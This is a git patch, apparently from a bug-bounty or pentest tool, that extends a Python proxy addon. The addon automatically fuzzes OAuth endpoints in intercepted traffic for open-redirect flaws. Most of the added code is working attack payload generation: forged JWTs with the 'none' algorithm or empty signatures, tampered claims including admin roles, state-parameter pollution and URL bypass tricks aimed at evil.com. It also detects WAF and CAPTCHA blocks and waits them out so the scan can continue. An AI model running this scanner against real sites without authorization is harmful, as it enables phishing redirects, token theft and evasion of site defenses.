From 182ea2117814d47b751f2efb5b03877d6fcadc12 Mon Sep 17 00:00:00 2001 From: gyuu04 Date: Thu, 17 Jul 2025 12:11:03 +0900 Subject: [PATCH] =?UTF-8?q?open=20redirect=20=ED=83=90=EC=A7=80?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- addon/open_redirect_check.py | 864 +++++++++++++++++++++++------------ 1 file changed, 578 insertions(+), 286 deletions(-) diff --git a/addon/open_redirect_check.py b/addon/open_redirect_check.py index 9ea39cb..94f20f0 100644 --- a/addon/open_redirect_check.py +++ b/addon/open_redirect_check.py @@ -7,7 +7,7 @@ from urllib.parse import urlparse, parse_qs, urlencode, urlunparse from lib.report_vuln import report_vuln class RedirectRateLimiter: - """클라이언트 앱 Open Redirect 체크 전용 rate limiter""" + """OAuth Open Redirect 체크 전용 rate limiter""" def __init__(self): self.last_request = 0 self.request_count = 0 @@ -15,9 +15,10 @@ class RedirectRateLimiter: self.consecutive_failures = 0 self.blocked_until = 0 self.pattern_index = 0 # 현재 테스트 중인 패턴 번호 + self.should_abandon_target = False # 설정값 (전체 패턴 기준으로 최적화) - self.base_delay = 1.0 # 기본 1초 지연 (65개니까 빠르게) + self.base_delay = 2.0 # 기본 2초 지연 self.failure_backoff = 0.5 # 실패시 0.5초씩 증가 self.max_delay = 5.0 # 최대 5초 지연 self.block_duration = 300 # 5분 차단 @@ -31,29 +32,21 @@ class RedirectRateLimiter: self.consecutive_failures = 0 self.blocked_until = 0 self.pattern_index = 0 + self.should_abandon_target = False print("[RATE_LIMIT] 새로운 타겟을 위해 Rate Limiter 리셋됨") async def wait_if_needed(self, pattern_name: str, target_url: str = "") -> bool: """속도 조절 및 차단 대기""" current_time = time.time() + + if self.should_abandon_target: + print(f"[TARGET_ABANDON] ⏹️ 타겟 포기됨 - 테스트 중단") + return False # 차단 중인지 확인 if current_time < self.blocked_until: remaining = int(self.blocked_until - current_time) - - # 차단 이유 판단 - if remaining > 200: # 5분에 가까우면 강한 차단 - print(f"\n🛡️ 타겟 사이트의 보안 메커니즘이 감지됨!") - block_reason = "Security Block" - elif remaining > 100: # 2-3분이면 일시적 문제 - print(f"\n⚠️ 타겟 서버 일시적 문제!") - block_reason = "Server Issue" - else: # 짧으면 가벼운 제한 - print(f"\n🔒 타겟 사이트 접근 제한!") - block_reason = "Access Limit" - - print(f"⏰ {remaining}초 대기 후 {pattern_name} 패턴 퍼징 재개... (이유: {block_reason})") - + # 카운트다운 (10초 단위) for i in range(remaining, 0, -1): if i % 10 == 0 or i <= 10: @@ -80,9 +73,8 @@ class RedirectRateLimiter: self.request_count += 1 self.pattern_index += 1 - # 진행률 표시 if self.pattern_index % 5 == 0: - print(f"[FUZZER] 📊 {self.pattern_index}/65 우회 패턴 테스트 완료 ({(self.pattern_index/65)*100:.1f}%)") + print(f"[PROGRESS] 📊 {self.pattern_index}/71 패턴 테스트 완료 ({(self.pattern_index/71)*100:.1f}%)") return True @@ -120,6 +112,12 @@ class RedirectRateLimiter: self.failure_count += 1 self.consecutive_failures += 1 + # 연속 5회 실패시 타겟 포기 + if self.consecutive_failures >= 5: + self.should_abandon_target = True # ← 포기 플래그 설정 + print(f"[TARGET_ABANDON] 🚫 연속 실패 {self.consecutive_failures}회 - 타겟 포기") + return + # 웹사이트 방어 메커니즘 감지 패턴들 rate_limit_patterns = [ '429', # Too Many Requests @@ -136,59 +134,23 @@ class RedirectRateLimiter: 'captcha', 'recaptcha', 'bot detected', 'suspicious activity' ] - - # 일시적 서버 문제 - temporary_patterns = [ - '503', 'service unavailable', - 'server overloaded', 'temporarily unavailable', - 'maintenance', 'under maintenance' - ] - + error_lower = str(error_msg).lower() - # 1. Rate Limit 감지 if any(pattern in error_lower for pattern in rate_limit_patterns): self.blocked_until = time.time() + self.block_duration print(f"[RATE_LIMIT] 🚫 웹사이트 Rate Limit 감지 - {self.block_duration}초 대기 예정") - print(f"[INFO] 💡 타겟 사이트가 요청 빈도를 제한하고 있습니다: {error_msg}") return - # 2. 보안 솔루션 차단 elif any(pattern in error_lower for pattern in security_block_patterns): self.blocked_until = time.time() + self.block_duration print(f"[SECURITY_BLOCK] 🛡️ 웹방화벽/보안 솔루션 차단 - {self.block_duration}초 대기 예정") - print(f"[INFO] 💡 Cloudflare, WAF 등이 요청을 차단했습니다: {error_msg}") - return - - # 3. 일시적 서버 문제 - elif any(pattern in error_lower for pattern in temporary_patterns): - short_wait = min(self.block_duration // 2, 150) - self.blocked_until = time.time() + short_wait - print(f"[SERVER_ISSUE] ⚠️ 서버 일시적 문제 - {short_wait}초 대기") - print(f"[INFO] 💡 타겟 서버에 일시적 문제가 있습니다: {error_msg}") return - # 4. 일반적인 HTTP 에러는 차단하지 않음 - else: - client_errors = ['400', '401', '404', 'bad request', 'unauthorized', 'not found'] - if any(code in error_lower for code in client_errors): - print(f"[HTTP_ERROR] ⚠️ HTTP 클라이언트 에러 (퍼징 계속): {error_msg}") - return - - # 403만 특별 처리 (웹방화벽일 가능성) - if '403' in error_lower: - short_wait = 60 - self.blocked_until = time.time() + short_wait - print(f"[ACCESS_DENIED] 🔒 접근 거부 - {short_wait}초 대기") - print(f"[INFO] 💡 타겟 사이트가 접근을 거부했습니다: {error_msg}") - return - - # 5. 연속 실패 임계값 - if self.consecutive_failures >= 15: + if self.consecutive_failures >= 5: short_wait = 120 self.blocked_until = time.time() + short_wait print(f"[FUZZER_PAUSE] ⏸️ 연속 실패 {self.consecutive_failures}회 - {short_wait}초 대기") - print(f"[INFO] 💡 타겟 사이트가 모든 우회 패턴을 차단하고 있을 수 있습니다.") # 글로벌 레이트 리미터 redirect_limiter = RedirectRateLimiter() @@ -200,12 +162,15 @@ class BypassPayload: self.mutate = mutate_func #우회 url 만드는 함수 self.description = description - class OpenRedirectChecker: def __init__(self): self.testing_targets = set() # 현재 테스트 중인 타겟들 - - """ 우회 페이로드 목록 """ + self.tested_endpoints = set() # 이미 테스트 완료된 엔드포인트들 + self.session = None + self._initialize_bypass_payloads() # bypass_payloads를 __init__에서 초기화 + + """ 우회 페이로드 목록 """ + def _initialize_bypass_payloads(self): self.bypass_payloads = [ BypassPayload( name=r"@", @@ -213,6 +178,42 @@ class OpenRedirectChecker: description=r"Host bypass attack using @ symbol: evil.com@target.com" ), + BypassPayload( + name="jwt_none_algorithm", + mutate_func=self._mutate_pattern47, + description="JWT state parameter 'none' algorithm bypass" + ), + + BypassPayload( + name="state_parameter_pollution", + mutate_func=self._mutate_pattern49, + description="Multiple state parameters pollution attack" + ), + + BypassPayload( + name=r"backslash_bypass", + mutate_func=self._mutate_pattern9, + description=r"Backslash URL parsing bypass: target.com\\evil.com" + ), + + BypassPayload( + name=r"double_slash", + mutate_func=self._mutate_pattern10, + description=r"Double slash bypass: target.com//evil.com" + ), + + BypassPayload( + name=r"wildcard_subdomain_bypass", + mutate_func=self._mutate_pattern8, + description=r"Wildcard subdomain bypass: attacker.target.com" + ), + + BypassPayload( + name=r"question_mark", + mutate_func=self._mutate_pattern11, + description=r"Question mark bypass: target.com?evil.com" + ), + BypassPayload( name=r"%ff@", mutate_func=self._mutate_pattern2, @@ -321,30 +322,6 @@ class OpenRedirectChecker: mutate_func=self._mutate_pattern7_12, description=r"Null byte traversal: target.com/path/../%00../evil.com" ), - - BypassPayload( - name=r"wildcard_subdomain_bypass", - mutate_func=self._mutate_pattern8, - description=r"Wildcard subdomain bypass: attacker.target.com" - ), - - BypassPayload( - name=r"backslash_bypass", - mutate_func=self._mutate_pattern9, - description=r"Backslash URL parsing bypass: target.com\\evil.com" - ), - - BypassPayload( - name=r"double_slash", - mutate_func=self._mutate_pattern10, - description=r"Double slash bypass: target.com//evil.com" - ), - - BypassPayload( - name=r"question_mark", - mutate_func=self._mutate_pattern11, - description=r"Question mark bypass: target.com?evil.com" - ), BypassPayload( name=r"idn_homograph", @@ -585,9 +562,31 @@ class OpenRedirectChecker: mutate_func=self._mutate_pattern46, description=r"Question backslash combo: target.com?\\evil.com" ), - + + BypassPayload( + name="jwt_empty_signature", + mutate_func=self._mutate_pattern48, + description="JWT state parameter empty signature bypass" + ), + + BypassPayload( + name="state_case_insensitive", + mutate_func=self._mutate_pattern50, + description="State parameter case insensitive bypass: State, STATE, state" + ), + + BypassPayload( + name="jwt_header_manipulation", + mutate_func=self._mutate_pattern51, + description="JWT header manipulation bypass (typ, alg changes)" + ), + + BypassPayload( + name="jwt_payload_pollution", + mutate_func=self._mutate_pattern52, + description="JWT payload pollution with malicious claims" + ), ] - self.session = None """ 우회 URL 생성 목록 """ # 1. @ @@ -913,6 +912,137 @@ class OpenRedirectChecker: # 46. 물음표 + 백슬래시 조합 def _mutate_pattern46(self, original: str) -> str: return f"https://{original}?\\evil.com" + + # 47. JWT 'none' 알고리즘 우회 + def _mutate_pattern47(self, original: str) -> str: + import base64 + import json + + # 'none' 알고리즘으로 서명 없는 JWT 생성 + header = {"alg": "none", "typ": "JWT"} + payload = { + "redirect": "https://evil.com", + "iss": "evil.com", + "aud": "client_app", + "exp": 9999999999 + } + + header_b64 = base64.urlsafe_b64encode( + json.dumps(header, separators=(',', ':')).encode() + ).decode().rstrip('=') + + payload_b64 = base64.urlsafe_b64encode( + json.dumps(payload, separators=(',', ':')).encode() + ).decode().rstrip('=') + + # 서명 부분을 빈 문자열로 (none 알고리즘) + malicious_jwt = f"{header_b64}.{payload_b64}." + + parsed = urlparse(original) + return f"https://{parsed.netloc}{parsed.path}?state={malicious_jwt}&redirect_uri=https://evil.com" + + # 48. JWT 빈 서명 우회 + def _mutate_pattern48(self, original: str) -> str: + import base64 + import json + + # 정상적인 헤더이지만 서명은 빈 값 + header = {"alg": "HS256", "typ": "JWT"} + payload = {"redirect": "https://evil.com"} + + header_b64 = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=') + payload_b64 = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode().rstrip('=') + + # 서명 부분만 비우기 + malicious_jwt = f"{header_b64}.{payload_b64}." + + parsed = urlparse(original) + return f"https://{parsed.netloc}{parsed.path}?state={malicious_jwt}&redirect_uri=https://evil.com" + + # 49. State 파라미터 오염 공격 + def _mutate_pattern49(self, original: str) -> str: + parsed = urlparse(original) + query = parse_qs(parsed.query) + + # 원본 쿼리 파라미터 유지하면서 state 여러 개 추가 + evil_params = [] + for key, values in query.items(): + for value in values: + evil_params.append(f"{key}={value}") + + # 여러 state 파라미터 추가 (파서 혼동 유발) + evil_params.extend([ + "state=legitimate_state", + "state=https://evil.com", + "State=https://evil.com", # 대문자 + "STATE=https://evil.com", # 모두 대문자 + "redirect_uri=https://evil.com" + ]) + + evil_query = "&".join(evil_params) + return f"https://{parsed.netloc}{parsed.path}?{evil_query}" + + def _mutate_pattern50(self, original: str) -> str: + """50. State 파라미터 대소문자 변형""" + parsed = urlparse(original) + base_url = f"https://{parsed.netloc}{parsed.path}" + + # 대소문자 조합으로 파서 혼동 + return f"{base_url}?state=normal&State=https://evil.com&STATE=backup&redirect_uri=https://evil.com" + + # 51. JWT 헤더 조작 우회 + def _mutate_pattern51(self, original: str) -> str: + import base64 + import json + + # 헤더에 이상한 값들 넣어보기 + malicious_headers = [ + {"alg": "none", "typ": "JWT", "kid": "../../../evil.com"}, + {"alg": "HS256", "typ": "JWS"}, # typ 변경 + {"alg": "RS256", "typ": "JWT", "x5u": "https://evil.com/cert"}, # 외부 인증서 + ] + + results = [] + for header in malicious_headers: + payload = {"redirect": "https://evil.com"} + + header_b64 = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=') + payload_b64 = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode().rstrip('=') + + jwt_token = f"{header_b64}.{payload_b64}.fake_signature" + results.append(jwt_token) + + # 첫 번째 조작된 JWT 사용 + parsed = urlparse(original) + return f"https://{parsed.netloc}{parsed.path}?state={results[0]}&redirect_uri=https://evil.com" + + # 52. JWT 페이로드 오염 공격 + def _mutate_pattern52(self, original: str) -> str: + import base64 + import json + + # 페이로드에 다양한 클레임 주입 + malicious_payload = { + "iss": "https://evil.com", # 발급자 변조 + "aud": "evil_client", # 대상 변조 + "redirect": "https://evil.com", # 직접적인 리다이렉트 + "redirect_uri": "https://evil.com", # OAuth 파라미터 + "url": "https://evil.com", # 일반적인 URL 파라미터 + "callback": "https://evil.com", # 콜백 URL + "return_to": "https://evil.com", # 리턴 URL + "admin": True, # 권한 상승 시도 + "role": "admin" # 역할 변조 + } + + header = {"alg": "HS256", "typ": "JWT"} + + header_b64 = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=') + payload_b64 = base64.urlsafe_b64encode(json.dumps(malicious_payload).encode()).decode().rstrip('=') + + jwt_token = f"{header_b64}.{payload_b64}.evil_signature" + + parsed = urlparse(original) + return f"https://{parsed.netloc}{parsed.path}?state={jwt_token}&redirect_uri=https://evil.com" '''aiohttp 세션 생성 (재사용)''' async def _get_session(self): @@ -953,227 +1083,366 @@ class OpenRedirectChecker: redirect_limiter.record_failure(str(e)) print(f"[ERROR] 요청 실패 ({url}): {e}") return {'status': 500, 'location': '', 'headers': {}} - - """ redirect_uri가 악성 패턴을 포함하는지 빠르게 검사 """ - def _is_baseline_valid(self, redirect_uri: str, base_url: str) -> bool: - try: - base_parsed = urlparse(base_url) - base_host = base_parsed.hostname - - if not base_host: - return False - - # 악성 패턴 빠른 검사 (로그 없이) - malicious_patterns = [ - "еvil.example", "[::1]", "[2001:db8", "#@", "%ff", - "/", "\", "%EF%BC%8F", "%EF%BC%BC", "evil.com" - ] - - for pattern in malicious_patterns: - if pattern in redirect_uri: - return False - - # @ 기반 우회 패턴 검사 - if "@" in redirect_uri: - at_parts = redirect_uri.split('@') - if len(at_parts) >= 2: - before_at = at_parts[0] - if '//' in before_at: - potential_domain = before_at.split('//')[-1] - if '.' in potential_domain and potential_domain != base_host: - return False - - # 일반 도메인 검증 - if "@" not in redirect_uri: - redirect_parsed = urlparse(redirect_uri) - redirect_host = redirect_parsed.hostname - if redirect_host: - return (redirect_host == base_host or redirect_host.endswith(f".{base_host}")) - - return True - - except Exception: - return False - """ Location 헤더에서 authorization code 추출 """ - def _extract_code_from_location(self, location: str) -> str: - if not location: - return "" - - try: - parsed = urlparse(location) - query = parse_qs(parsed.query) - return query.get('code', [''])[0] - except: - return "" + def _is_client_redirect_request(self, url, parsed, query): + """OAuth 콜백 감지 - OAuth 로그인 완료 후 돌아온 페이지인가 확인""" - """진짜 redirect 파라미터인지 판단""" - def _is_real_redirect_param(self, param_name, param_value): - # redirect_uri 제거하고 클라이언트 앱 파라미터들만 - obvious_redirect_params = [ - "next", "return_to", "redirect", "redirect_url", - "continue", "goto", "destination", "forward", - "callback_url", "back" + # 0. OAuth 제공자 제외 + oauth_provider_domains = [ + # Google + "accounts.google.com", "oauth2.googleapis.com", + # Facebook/Meta + "www.facebook.com", "facebook.com", "graph.facebook.com", + # Microsoft + "login.live.com", "login.microsoftonline.com", "account.live.com", + "login.windows.net", "login.microsoft.com", + # GitHub + "github.com", "api.github.com", + # Apple + "appleid.apple.com", "accounts.apple.com", + # Others + "login.yahoo.com", "accounts.twitter.com", "api.twitter.com", + "linkedin.com", "www.linkedin.com", + "kauth.kakao.com", "accounts.kakao.com", + # 추가 제외할 제공자들 + "auth0.com", "okta.com", "onelogin.com" ] + + if any(provider in parsed.netloc for provider in oauth_provider_domains): + return False + + # 1. URL 경로로 OAuth 콜백인지 확인 - 기존 OAuth 콜백 패턴 + oauth_callback_patterns = [ + '/oauth/callback', '/auth/callback', '/login/callback', + '/oauth/redirect', '/auth/return', '/sso/callback', + '/signup', '/register', + ] + + path = parsed.path.lower() + is_oauth_callback = any(pattern in path for pattern in oauth_callback_patterns) + + # 2. OAuth 응답 파라미터 확인 - URL에 아래 정보 있는지 확인 + oauth_response_params = [ + 'code', 'access_token', 'id_token', 'state', 'error', + 'from' # from=fb, from=google 등 + ] + + has_oauth_response = any(param in query for param in oauth_response_params) - if param_name in obvious_redirect_params: - return True + # 3. 소셜 로그인 패턴 감지 - 어디서 로그인했는지 확인 + def has_social_login_pattern(query_string): + import re + + # 패턴 1: 간단한 소셜 식별자 + simple_patterns = ['from=fb', 'from=facebook', 'from=google', 'from=github'] + has_simple = any(pattern in query_string.lower() for pattern in simple_patterns) + + # 패턴 2: URL 형태 + url_pattern = r'from=https?%3A%2F%2F' # from=https:// (URL 인코딩됨) + has_url = bool(re.search(url_pattern, query_string)) + + return has_simple or has_url + + query_string = parsed.query + has_social_login = has_social_login_pattern(query_string) - # 모호한 파라미터는 값으로 판단 - ambiguous_params = ["url", "target", "link", "state"] - if param_name in ambiguous_params: - if (param_value.startswith(('http', '/', '.')) or - '/' in param_value or - len(param_value) > 15): + # 4. 리다이렉트 파라미터(우리가 공격할 타겟) 확인 + client_redirect_params = [ + 'next', 'return_to', 'continue', 'redirect_uri', 'redirect_url', + 'destination', 'success_url', 'callback_url', 'goto', 'forward_to', + 'redirectUrl', 'redirectURL', 'redirect_to', 'returnUrl', 'returnURL', + 'from', 'target', 'targetUrl', 'targetURL' # 일반적인 변형들 추가 + ] + + has_redirect_param = any(param in query for param in client_redirect_params) + + # 5. OAuth 혼합 패턴 감지 (요청+응답 파라미터 동시 존재) + oauth_request_params = ['client_id', 'response_type'] + oauth_redirect_params = ['return_to', 'redirect_uri'] + has_oauth_request = any(param in query for param in oauth_request_params) + has_oauth_redirect = any(param in query for param in oauth_redirect_params) + + # 최종 판단 기준 1 - (콜백 경로 + OAuth 파라미터) 또는 소셜 로그인 있고, 리다이렉트 파라미터 또는 state 있으면 → OAuth 콜백! + if (is_oauth_callback and has_oauth_response) or has_social_login: + if has_redirect_param or 'state' in query: + print(f"[CLIENT_OAUTH] 📱 OAuth 콜백 감지: {parsed.netloc}") return True + # 최종 판단 기준 2 - OAuth 요청 파라미터와 리다이렉트 파라미터가 둘 다 있으면 → OAuth 혼합 패턴! + if has_oauth_request and has_oauth_redirect: + print(f"[CLIENT_OAUTH] 📱 OAuth 혼합 패턴 감지: {parsed.netloc}") + return True + return False - def _is_oauth_request_worth_testing(self, url, parsed, query): - """OAuth 콜백 완료 후 클라이언트 앱 테스트""" + def _is_self_oauth_request(self, url, parsed, query): + """자체 OAuth - authorize 엔드포인트 요청인지 확인 (로그인 불필요)""" - # OAuth 제공자 도메인은 제외 + # 0. OAuth 제공자 도메인 제외 oauth_provider_domains = [ - "accounts.google.com", - "www.facebook.com", - "github.com", - "login.microsoftonline.com" + "accounts.google.com", "oauth2.googleapis.com", + "www.facebook.com", "facebook.com", "graph.facebook.com", + "github.com", "api.github.com", + "login.microsoftonline.com", "login.live.com", + "account.live.com", "login.windows.net", "login.microsoft.com", + "appleid.apple.com", "accounts.apple.com", + "login.yahoo.com", "accounts.twitter.com","api.twitter.com", + "linkedin.com", "www.linkedin.com", + "okta.com", + "auth0.com", "onelogin.com", ] - - # OAuth 제공자 요청은 스킵 - if any(provider in parsed.netloc for provider in oauth_provider_domains): - print(f"[DEBUG] ❌ OAuth 제공자 요청 - 클라이언트 테스트 대상 아님: {parsed.netloc}") - return False - - # 클라이언트 앱의 OAuth 콜백/로그인 경로들 - oauth_callback_paths = [ - "/auth/callback", "/oauth/callback", "/login/callback", - "/auth", "/login", "/sso", "/signin", "/callback" - ] - - has_oauth_path = any(path in parsed.path for path in oauth_callback_paths) - if not has_oauth_path: - return False - - # OAuth 성공 파라미터 확인 - oauth_success_params = ["code", "access_token", "id_token"] - has_oauth_success = any(param in query for param in oauth_success_params) - - # redirect 관련 파라미터 확인 - redirect_params = ["next", "return_to", "redirect", "redirect_url", "continue", "goto", "state"] - has_redirect_param = any(param in query for param in redirect_params) - - if has_oauth_path and (has_oauth_success or has_redirect_param): - print(f"[DEBUG] 🎯 클라이언트 OAuth 콜백/로그인 URL 감지!") - print(f"[DEBUG] Host: {parsed.netloc}") - print(f"[DEBUG] Path: {parsed.path}") - print(f"[DEBUG] OAuth success: {has_oauth_success}") - print(f"[DEBUG] Has redirect: {has_redirect_param}") - return True - - return False - """ Open Redirect 탐지 로직 - 요청 감지 단계 """ + if any(provider in parsed.netloc for provider in oauth_provider_domains): + return False + + # 1. 자체 OAuth 엔드포인트 패턴 확인 + oauth_endpoints = [ + '/oauth/authorize', '/oauth/auth', '/auth/oauth', + '/sso/authorize', '/api/oauth/authorize', + '/v1/oauth/authorize', '/oauth2/authorize', + '/oauth2/v1/authorize', + '/authorize', # 일반적인 authorize 추가 + '/auth/realms', # Keycloak 패턴 + '/connect/authorize' # IdentityServer 패턴 + ] + + path = parsed.path.lower() + is_oauth_path = any(endpoint in path for endpoint in oauth_endpoints) + + # 2. OAuth 요청 파라미터 확인 - OAuth 로그인에 필요한 정보들이 있는지 확인 + oauth_request_params = ['client_id', 'redirect_uri', 'response_type', 'scope'] + has_oauth_params = any(param in query for param in oauth_request_params) + + # 3. 표준 OAuth 파라미터 조합 확인 - OAuth의 핵심 3요소가 모두 있는지 확인 + has_standard_oauth = ( + 'client_id' in query and + 'redirect_uri' in query and + 'response_type' in query + ) + + # 최종 판단 기준 - 조건 1: (OAuth 경로 + OAuth 파라미터) 있거나 조건 2: 표준 OAuth 3요소 모두 있으면 → 자체 OAuth 시스템! + if (is_oauth_path and has_oauth_params) or has_standard_oauth: + print(f"[SELF_OAUTH] 🏠 자체 OAuth 제공자 감지: {parsed.netloc}") + return True + + return False + async def test(self, flow: http.HTTPFlow): + """테스트 시작점 - url 받아와서 oauth 콜백/자체 oauth인지 체크""" url = flow.request.pretty_url parsed = urlparse(url) - query = parse_qs(parsed.query) + query = parse_qs(parsed.query) - # GET 요청만 처리 if flow.request.method != "GET": return - # OAuth 요청인지 먼저 확인 (API 검증 전에) - if not self._is_oauth_request_worth_testing(url, parsed, query): - return # OAuth 요청이 아니면 바로 종료 - - # 이미 이 타겟을 테스트 중인지 확인 - target_key = f"{parsed.netloc}" - if target_key in self.testing_targets: - print(f"[OAUTH_SKIP] 이미 {target_key} 테스트 진행 중 - 중복 테스트 방지") + # OAuth 관련 요청인지 확인 + if (self._is_client_redirect_request(url, parsed, query) or + self._is_self_oauth_request(url, parsed, query)): + await self._test_oauth_redirect(url, parsed, query) return - # 테스트 시작 표시 - self.testing_targets.add(target_key) + async def _test_oauth_redirect(self, url, parsed, query): + """OAuth 리다이렉트 취약점 테스트""" + + # 중복 테스트 방지 + endpoint_key = f"OAUTH:{parsed.netloc}{parsed.path}" + + if endpoint_key in self.tested_endpoints: + return # 이미 테스트했으므로 패스 + if endpoint_key in self.testing_targets: + return # 현재 테스트 중이므로 패스 + + self.testing_targets.add(endpoint_key) try: - print(f"[CLIENT_TARGET] 🎯 클라이언트 앱 Open Redirect 테스트 대상: {parsed.netloc}") + print(f"[START] 🔍 테스트 시작: {parsed.netloc}{parsed.path}") + print(f"[TARGET] 타겟: {parsed.netloc}") - # redirect 파라미터가 있는지 확인 - redirect_param = None - original_redirect_value = None + # 1. state 파라미터 확인 후 조작 + if 'state' in query: + await self._test_state_parameter_manipulation(url, parsed, query) + + # 2. 테스트할 파라미터들 찾기 + test_params = [] - # 클라이언트 앱 파라미터들만 체크 - redirect_params = [ - "next", "return_to", "redirect", "redirect_url", - "continue", "goto", "destination", "callback_url", - "forward", "state" # state도 리다이렉트용으로 쓰이기도 함 + # redirect_uri (자체 OAuth에서 주로 사용) + if 'redirect_uri' in query: + test_params.append(('redirect_uri', query['redirect_uri'][0])) + + # 클라이언트 리다이렉트 파라미터들 + client_redirect_params = [ + 'next', 'return_to', 'continue', 'redirect_url', + 'destination', 'success_url', 'callback_url', 'goto', 'forward_to', + 'redirectUrl', 'from', 'target' ] - - for param in redirect_params: - if param in query: - value = query[param][0] - if self._is_real_redirect_param(param, value): - redirect_param = param - original_redirect_value = value - break - if not redirect_param: - print(f"[OAUTH_SKIP] redirect 파라미터 없음 - 테스트 건너뛰기") + for param in client_redirect_params: + if param in query: + test_params.append((param, query[param][0])) + + # 테스트할 파라미터가 없으면 종료 + if not test_params: + print(f"[OAUTH] 리다이렉트 파라미터 없음 - 테스트 ❌") return - print(f"[OPEN_REDIRECT] 파라미터: {redirect_param}={original_redirect_value}") + print(f"[OAUTH] 📍 발견된 파라미터들: {test_params}") print(f"[OPEN_REDIRECT] 총 우회 패턴: {len(self.bypass_payloads)}") print("-" * 50) - - redirect_limiter.reset_for_new_target() - tested_count = 0 + redirect_limiter.reset_for_new_target() success_count = 0 - - # 모든 우회 패턴 테스트 - for payload in self.bypass_payloads: - try: - print(f"[{tested_count+1:2d}/{len(self.bypass_payloads)}] {payload.name}", end=" ... ") + + # 3. 각 파라미터별로 모든 우회 패턴 테스트 + for param_name, original_value in test_params: + print(f"\n[OAUTH] 🎯 {param_name} 파라미터 테스트 시작") + + for i, payload in enumerate(self.bypass_payloads, 1): + print(f"[{i:2d}/{len(self.bypass_payloads)}] {payload.name}", end=" ... ") result = await self._test_bypass_pattern( - url, query, parsed, original_redirect_value, payload, redirect_param, headers={} + url, query, parsed, original_value, payload, param_name ) - tested_count += 1 if result: success_count += 1 print("🚨 VULNERABLE!") else: print("✓") - - except Exception as e: - print(f"❌ ERROR: {e}") - tested_count += 1 - continue + + # 조기 종료 체크 (연속 실패) + can_proceed = await redirect_limiter.wait_if_needed(payload.name) + if not can_proceed: + print(f"\n[TARGET_ABANDON] 🚫 타겟 포기로 인한 테스트 조기 종료") + break + + # 한 파라미터에서 포기했으면 다른 파라미터도 건너뛰기 + if redirect_limiter.should_abandon_target: + break print("-" * 50) - print(f"[OPEN_REDIRECT] ✅ 테스트 완료!") - - if success_count > 0: - print(f"[OPEN_REDIRECT] 🚨 Open Redirect 취약점: {success_count}개") - else: - print(f"[OPEN_REDIRECT] ✅ 취약점 없음") + print(f"[OAUTH] ✅ OAuth 테스트 완료: {success_count}개 취약점") + except Exception as e: + print(f"[ERROR] OAuth 테스트 실패: {e}") finally: - # 테스트 완료 후 제거 - self.testing_targets.discard(target_key) + self.testing_targets.discard(endpoint_key) + self.tested_endpoints.add(endpoint_key) + await self.close_session() + + async def _test_state_parameter_manipulation(self, url, parsed, query): + """State 파라미터 조작 테스트""" + print(f"[STATE_TEST] 🔍 State 파라미터 조작 테스트") + + # 원본 state 확인 + original_state = query['state'][0] + print(f"[STATE_TEST] 원본 state: {original_state[:50]}...") + + # State 공격 패턴들 + state_attacks = { + "state_direct_url": "https://evil.com", + "state_protocol_relative": "//evil.com", + "state_json_redirect": '{"redirect": "https://evil.com"}', + "state_json_return_to": '{"return_to": "https://evil.com"}', + "state_json_callback": '{"callback": "https://evil.com"}', + "state_query_redirect": "redirect=https://evil.com", + "state_query_return_to": "return_to=https://evil.com", + "state_base64_json": "eyJyZWRpcmVjdCI6ICJodHRwczovL2V2aWwuY29tIn0=", + "state_jwt_attack": "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJyZWRpcmVjdCI6Imh0dHBzOi8vZXZpbC5jb20ifQ.", + "state_original_append": f"{original_state}&redirect=https://evil.com", + "state_original_pipe": f"{original_state}|https://evil.com", + "state_url_encoded": "https%3A//evil.com" + } + + success_count = 0 + + for i, (attack_name, malicious_state) in enumerate(state_attacks.items(), 1): + print(f"[STATE_TEST] [{i:2d}/{len(state_attacks)}] {attack_name}") + + # 원본 쿼리 복사하고 state만 변경 + modified_query = query.copy() + modified_query['state'] = [malicious_state] + + # 새 URL 생성 + new_query_string = urlencode(modified_query, doseq=True) + test_url = urlunparse(parsed._replace(query=new_query_string)) + + # 요청 전송 + response = await self._send_request(test_url) + + # State 전용 취약점 분석 + if await self._analyze_state_vulnerability(url, test_url, malicious_state, response, attack_name): + success_count += 1 + print(f"[STATE_TEST] ✅ 취약점 발견! {attack_name}") + else: + print(f"[STATE_TEST] ✓ {attack_name}") + + # 레이트 리미팅 + await redirect_limiter.wait_if_needed(f"state_{attack_name}") + + print(f"[STATE_TEST] ✅ State 테스트 완료: {success_count}/{len(state_attacks)} 취약점 발견") + + async def _analyze_state_vulnerability(self, original_url, test_url, malicious_state, response, attack_name): + """State 파라미터 취약점 전용 분석""" + status = response['status'] + location = response['location'] + + # 리다이렉트 응답인지 확인 + if status not in [301, 302, 303, 307, 308]: + return False + + if not location: + return False + + # 악성 도메인으로 리다이렉트되었는지 확인 + if self._is_redirected_to_malicious_domain(location): + + print(f"[🎯 VULNERABILITY CONFIRMED] OAuth State 조작 취약점 발견!") + + await self._report_state_vulnerability( + original_url, test_url, malicious_state, + location, attack_name + ) + return True + + return False + + async def _report_state_vulnerability(self, original_url, test_url, malicious_state, location, attack_name): + """State 파라미터 취약점 전용 리포트""" + + description = ( + f"OAuth State Parameter Manipulation 취약점 발견!\n\n" + f"• 공격 방법: {attack_name}\n" + f"• 원본 URL: {original_url}\n" + f"• 조작된 state 값: {malicious_state}\n" + f"• 테스트 URL: {test_url}\n" + f"• 실제 리다이렉트 위치: {location}\n\n" + f"🚨 State 파라미터 조작을 통한 피싱 공격이 가능합니다!\n" + ) + + report_vuln( + title="OAuth State Parameter Manipulation Vulnerability", + desc=description, + status="HIGH", + uri=test_url + ) + + print(f"🎯 OAuth State 조작 취약점 발견 및 보고 완료!") """ 우회 URL 생성 및 요청 전송 """ - async def _test_bypass_pattern(self, original_url, query, parsed_url, original_redirect_value, payload, redirect_param, headers): + async def _test_bypass_pattern(self, original_url, query, parsed_url, original_redirect_value, payload, redirect_param): - # 레이트 리미팅 체크 추가 + # 레이트 리미팅 체크 can_proceed = await redirect_limiter.wait_if_needed(payload.name) if not can_proceed: + print(f"[TARGET_ABANDON] ⏹️ 패턴 테스트 중단: {payload.name}") return False try: - # 원본 redirect 값에 우회 패턴 적용 + # 1. 테스트 시작 + print(f"[PATTERN] 🚀 {payload.name} 테스트 